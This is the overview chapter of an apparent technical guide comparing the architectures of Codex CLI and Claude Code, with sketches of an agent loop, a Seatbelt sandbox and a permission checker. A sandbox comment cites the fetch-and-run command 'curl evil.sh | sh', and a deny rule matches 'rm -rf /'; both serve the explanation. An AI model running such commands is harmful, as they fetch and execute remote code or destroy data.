# Chapter 1: Overview
## What Is a Coding Agent?
A coding agent is an AI system that can autonomously write, modify, and debug code by combining a large language model (LLM) with a set of tools — shell access, file editing, search, and more. Unlike a chatbot that only suggests code, a coding agent acts: it reads your codebase, runs commands, edits files, and iterates until the task is done.
The core loop is deceptively simple:
User prompt → LLM reasoning → Tool calls → Results fed back → LLM continues → ... → Done
The engineering challenge is everything around that loop: security, permissions, context management, prompt construction, error recovery, and user experience.
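To make the loop concrete, here is a minimal sketch in TypeScript. Every name in it (`ModelTurn`, `callModel`, `runTool`) is an illustrative placeholder rather than an API from either agent; the real loops wrap this skeleton in the security, context, and recovery machinery described above.

```typescript
// Minimal sketch of the agent loop above. All names here are
// illustrative placeholders, not APIs from Codex or Claude Code.

interface ToolCall {
  name: string;                  // e.g. "shell" or "edit_file"
  args: Record<string, unknown>;
}

interface ModelTurn {
  text: string;                  // the model's reasoning or reply
  toolCalls: ToolCall[];         // empty once the model is done
}

async function runAgent(
  userPrompt: string,
  callModel: (transcript: string[]) => Promise<ModelTurn>,
  runTool: (call: ToolCall) => Promise<string>,
): Promise<string> {
  const transcript: string[] = [userPrompt];

  while (true) {
    // LLM reasoning: the model sees everything so far and responds.
    const turn = await callModel(transcript);
    transcript.push(turn.text);

    // No tool calls means the model considers the task done.
    if (turn.toolCalls.length === 0) return turn.text;

    // Tool calls: execute each one and feed the result back.
    for (const call of turn.toolCalls) {
      const result = await runTool(call);
      transcript.push(`[${call.name}] ${result}`);
    }
  }
}
```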
## The Two Agents
This project compares two production coding agents that represent different engineering philosophies:
### Codex CLI (OpenAI)
- Repository: openai/codex
- Language: Rust (81 crates in a monorepo)
- UI: Ratatui (native terminal TUI)
- Distribution: Pre-compiled platform-specific binaries, distributed via an npm wrapper
- Models: GPT-4o, o3, GPT-5.x (OpenAI Responses API)
### Claude Code (Anthropic)
- Source: Closed-source; analysis based on decompiled source (v2.1.88) — see VERSIONS.md
- Language: TypeScript
- UI: Custom Ink-like renderer (React + react-reconciler); also available as a Desktop app (macOS, Windows)
- Distribution: Native binary installer (recommended, auto-updates), Homebrew, WinGet, Desktop app, npm (deprecated)
- Models: Claude Sonnet, Opus, Haiku (Anthropic Messages API)
## Design Philosophies
The two agents make fundamentally different bets about how to build a safe, effective coding agent:
Codex: "Sandbox everything, let the model run free inside"
Codex uses kernel-level sandboxing (Apple Seatbelt on macOS, Landlock + seccomp on Linux) to contain the model's actions. The model gets a powerful shell and can run whatever it wants — but the operating system enforces boundaries. This is a containment-first approach: assume the model will do unexpected things and make them physically impossible.
The tool set is minimal — mostly shell and apply_patch — because the model can do anything through the shell. A smaller tool set means a simpler system and a smaller attack surface.
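As a rough illustration of the containment idea (not Codex's actual code), the sketch below runs a command through macOS's `sandbox-exec` with a simplified Seatbelt profile that denies network access and file writes outside the workspace. Codex's real profiles are more involved, and Linux uses Landlock + seccomp instead.

```typescript
import { spawnSync } from "node:child_process";

// Rough illustration of containment-first execution on macOS, not
// Codex's actual implementation. The Seatbelt profile is a simplified
// assumption: allow by default, deny network access, and deny writes
// everywhere except the given workspace (later rules take precedence).
function runContained(command: string, workspace: string): string {
  const profile = `
    (version 1)
    (allow default)
    (deny network*)
    (deny file-write*)
    (allow file-write* (subpath "${workspace}"))
  `;

  // The kernel enforces the profile: even if the model emits
  // "curl evil.sh | sh", the OS refuses the network call.
  const result = spawnSync(
    "sandbox-exec",
    ["-p", profile, "bash", "-c", command],
    { encoding: "utf8" },
  );
  return result.stdout + result.stderr;
}
```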
Claude Code: "Analyze everything, ask before doing anything risky"
Claude Code uses application-level permission checks with an LLM-based classifier (a side query to Claude itself) to assess risk before execution. There's no kernel sandbox — instead, every tool call goes through a permission system that can auto-approve safe operations, prompt the user for risky ones, or deny dangerous ones outright.
The tool set is large (40+) with purpose-built tools for search, file editing, web access, and more. Each tool has its own permission logic, input validation, and output formatting. This is a control-at-every-layer approach.
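The sketch below condenses the control-at-every-layer idea into a single decision function: static rules handle the obvious cases, and anything ambiguous falls through to a model-based classifier. The rules, tool names, and classifier stub are invented for illustration; Claude Code's actual permission logic and classifier prompt differ.

```typescript
// Illustrative sketch of application-level permission checks, not
// Claude Code's actual rule set.

type Decision = "allow" | "ask" | "deny";

interface ToolCall {
  name: string;
  args: Record<string, unknown>;
}

// Static fast path: obviously safe reads auto-approve; obviously
// destructive commands are denied outright.
function staticRule(call: ToolCall): Decision | null {
  if (call.name === "read_file" || call.name === "search") return "allow";
  if (call.name === "shell" && /rm\s+-rf\s+\//.test(String(call.args.command))) {
    return "deny";
  }
  return null; // no static rule matched
}

// Ambiguous cases fall through to a side query against the model,
// asking it to classify the risk of the proposed call. Stubbed here;
// a real system would send a risk-assessment prompt and parse the verdict.
async function classifyWithLLM(call: ToolCall): Promise<Decision> {
  return "ask";
}

async function checkPermission(call: ToolCall): Promise<Decision> {
  return staticRule(call) ?? (await classifyWithLLM(call));
}
```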
### The Tradeoff
| Dimension | Codex (Containment) | Claude Code (Control) |
|---|---|---|
| What if the model does something unexpected? | Kernel blocks it | Permission system may not anticipate it |
| Tool flexibility | Model can pipe, chain, combine freely | Fixed tool interfaces |
| Portability | Requires OS-specific sandbox support | Runs anywhere Node/Bun runs |
| Token efficiency | Raw shell output, model formats it | Tool wrappers optimize output for tokens |
| Setup complexity | Needs platform-specific binaries | Pure JavaScript, simpler deployment |
Neither approach is strictly better — they optimize for different threat models and use cases.
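To make the token-efficiency row concrete, here is a hypothetical comparison of the two styles of returning shell output to the model. Both functions are invented for illustration, not taken from either codebase.

```typescript
// Illustrative sketch of the token-efficiency tradeoff.

// Raw approach: whatever the command printed goes straight into the
// model's context, and the model is trusted to cope with the volume.
function rawShellResult(stdout: string): string {
  return stdout;
}

// Wrapper approach: cap the output and note the truncation, spending
// fewer context tokens on output the model rarely needs in full.
function wrappedShellResult(stdout: string, maxLines = 50): string {
  const lines = stdout.split("\n");
  if (lines.length <= maxLines) return stdout;
  const omitted = lines.length - maxLines;
  return lines.slice(0, maxLines).join("\n") +
    `\n... (${omitted} more lines omitted)`;
}
```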
## What's Ahead
The following chapters break down each component of the agent architecture, showing how both agents implement it and what tradeoffs they make. Each chapter is self-contained — read them in order or jump to what interests you.